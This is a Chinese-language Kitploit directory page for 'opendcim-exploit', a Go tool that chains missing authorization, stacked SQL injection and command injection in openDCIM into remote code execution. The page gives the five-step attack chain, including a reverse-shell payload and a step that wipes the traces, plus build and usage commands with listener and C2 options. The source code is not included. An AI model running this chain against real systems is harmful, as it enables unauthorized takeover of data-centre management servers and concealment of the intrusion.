Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
opendcim-exploit — openDCIM install.php SQLi 到 RCE 链 (CWE-862 + CWE-89 + CWE-78) | Kitploit
工具/GitHubGitHub/chocapikk/opendcim-exploit
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制
GitHubchocapikk/opendcim-exploit

opendcim-exploit

openDCIM install.php SQLi 到 RCE 链 (CWE-862 + CWE-89 + CWE-78)

查看仓库
525个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

openDCIM - 通过配置污染实现 SQLi 到 RCE

针对 openDCIM 的 install.php LDAP 配置表单的远程代码执行链。基于 VulnCheck go-exploit 框架构建。

漏洞链

#CVECWE描述
1CVE-2026-28515CWE-862install.php 在 LDAP 配置表单之前不执行任何角色检查 - 任何用户都能访问它
2CVE-2026-28516CWE-89Config::UpdateParameter() 使用字符串插值,通过 PDO+MySQL 进行堆叠查询
3CVE-2026-28517CWE-78report_network_map.php 将 dot 配置值直接传递给 exec()

受影响版本: 所有版本(已在最新提交 4467e9c4 上测试)

工作原理

  1. 向 install.php 发送 POST 请求 - 通过 LDAP 表单进行 SQL 注入,备份配置,并用命令载荷覆盖 dot
  2. 向 report_network_map.php 发送 GET 请求 - 触发 exec(),通过 id 输出确认 RCE
  3. 向 install.php 发送 POST 请求 - 用反向 Shell 载荷覆盖 dot
  4. 向 report_network_map.php 发送 GET 请求 - 触发反向 Shell
  5. 向 install.php 发送 POST 请求 - 从备份表恢复所有原始配置值

利用后数据库中不留下任何痕迹。

构建

root@kitploit:~
go build -o opendcim-exploit .

使用方法

Docker 部署(未认证)

root@kitploit:~
# Scan only
./opendcim-exploit -a -rhost 10.0.0.1 -rport 80

# Exploit with reverse shell
./opendcim-exploit -e -rhost 10.0.0.1 -rport 80 -lhost 10.0.0.2 -lport 4444 -c2 SimpleShellServer

htpasswd 部署(任意有效用户)

root@kitploit:~
./opendcim-exploit -e -rhost 10.0.0.1 -rport 80 -lhost 10.0.0.2 -lport 4444 -c2 SimpleShellServer -username user -password pass

SSL

root@kitploit:~
./opendcim-exploit -e -rhost 10.0.0.1 -rport 443 -ssl -lhost 10.0.0.2 -lport 4444 -c2 SSLShellServer

参数

下载工具
参数默认值描述
-rhost目标主机
-rport80目标端口
-sslfalse使用 HTTPS
-lhost监听主机(用于反向 Shell)
-lport监听端口(用于反向 Shell)
-c2C2 类型:SimpleShellServer 或 SSLShellServer
-usernameHTTP 基本认证用户名(SetEnv 部署可省略)
-passwordHTTP 基本认证密码(SetEnv 部署可省略)
-a资产检测(检查目标是否可被利用)
-e漏洞利用模式